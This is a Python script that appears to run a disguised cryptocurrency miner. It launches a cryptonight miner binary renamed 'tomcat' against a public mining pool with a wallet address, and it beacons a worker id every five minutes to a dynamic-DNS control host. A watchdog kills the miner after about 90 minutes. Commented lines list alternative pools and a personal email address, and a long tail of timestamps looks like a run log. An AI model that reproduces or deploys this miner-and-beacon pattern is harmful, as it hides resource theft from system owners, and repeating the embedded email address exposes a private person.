import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:08.581828
#2018-02-17 17:18:06.350141
#2018-02-17 19:06:07.485915
#2018-02-17 20:56:07.179719
#2018-02-17 22:42:06.473039
#2018-02-18 00:26:06.312074
#2018-02-18 02:17:05.096184
#2018-02-18 04:05:03.094744
#2018-02-18 05:54:05.321966
#2018-02-18 07:45:06.475826
#2018-02-18 09:32:07.151373
#2018-02-18 11:18:02.171328
#2018-02-18 13:03:07.461577
#2018-02-18 14:51:06.738032
#2018-02-18 16:39:05.866840
#2018-02-18 18:28:05.875826
#2018-02-18 20:16:01.874764
#2018-02-18 22:00:08.336130
#2018-02-18 23:49:05.082135
#2018-02-19 01:35:03.512956
#2018-02-19 03:23:04.802362
#2018-02-19 05:08:06.451335
#2018-02-19 06:54:02.162725
#2018-02-19 08:42:03.975698
#2018-02-19 10:31:05.903840
#2018-02-19 12:18:09.358536
#2018-02-19 14:06:08.467963
#2018-02-19 15:55:03.171219
#2018-02-19 17:42:07.910267
#2018-02-19 19:30:08.994380
#2018-02-19 21:17:07.331252
#2018-02-19 23:04:07.027046
#2018-02-20 00:49:03.890752
#2018-02-20 02:37:05.814920
#2018-02-20 04:26:01.382855
#2018-02-20 06:09:06.447072
#2018-02-20 07:54:04.825102
#2018-02-20 09:39:08.148205
#2018-02-20 11:23:07.766367
#2018-02-20 13:09:07.414853
#2018-02-20 14:54:04.779201
#2018-02-20 16:39:07.030318
#2018-02-20 18:25:06.431022
#2018-02-20 20:16:06.120895
#2018-02-20 22:02:01.847873
#2018-02-20 23:43:06.932527
#2018-02-21 01:28:01.535341
#2018-02-21 03:15:04.490619
#2018-02-21 05:03:02.128059
#2018-02-21 06:51:03.742971
#2018-02-21 08:37:03.770171
#2018-02-21 10:23:05.423326
#2018-02-21 12:10:11.609146
#2018-02-21 14:00:10.723733
#2018-02-21 15:45:11.913817
#2018-02-21 17:37:06.769411
#2018-02-21 19:22:08.664554
#2018-02-21 21:09:07.983647
#2018-02-21 22:57:03.879067
#2018-02-22 00:43:07.745848
#2018-02-22 02:32:04.353204
#2018-02-22 04:18:06.376755
#2018-02-22 06:03:05.093132
#2018-02-22 07:49:01.984491
#2018-02-22 09:37:02.207533
#2018-02-22 11:24:04.791878
#2018-02-22 13:10:08.040274
#2018-02-22 14:58:01.976190
#2018-02-22 16:43:05.178598
#2018-02-22 18:29:09.760013
#2018-02-22 20:23:05.381499
#2018-02-22 22:09:01.590461
#2018-02-22 23:55:02.820695
#2018-02-23 01:43:06.657440
#2018-02-23 03:31:06.208276
#2018-02-23 05:16:02.136309
#2018-02-23 07:01:04.317965
#2018-02-23 08:50:09.684649
#2018-02-23 11:08:05.911295
#2018-02-23 13:02:04.656937
#2018-02-23 14:46:07.418740
#2018-02-23 16:34:01.334479
#2018-02-23 18:20:01.482828
#2018-02-23 20:04:07.904283
#2018-02-23 21:47:07.224686
#2018-02-23 23:41:08.075151
#2018-02-24 01:29:07.074183
#2018-02-24 03:19:05.373998
#2018-02-24 05:05:04.773641
#2018-02-24 06:53:05.471460
#2018-02-24 08:43:06.207411
#2018-02-24 10:28:01.451390
#2018-02-24 12:22:03.741407
#2018-02-24 14:16:04.341522
#2018-02-24 16:01:07.292818
#2018-02-24 17:55:06.581676
#2018-02-24 19:42:07.462754
#2018-02-24 21:28:07.680817
#2018-02-25 01:54:07.571681
#2018-02-25 05:06:01.312898
#2018-02-25 10:14:02.166146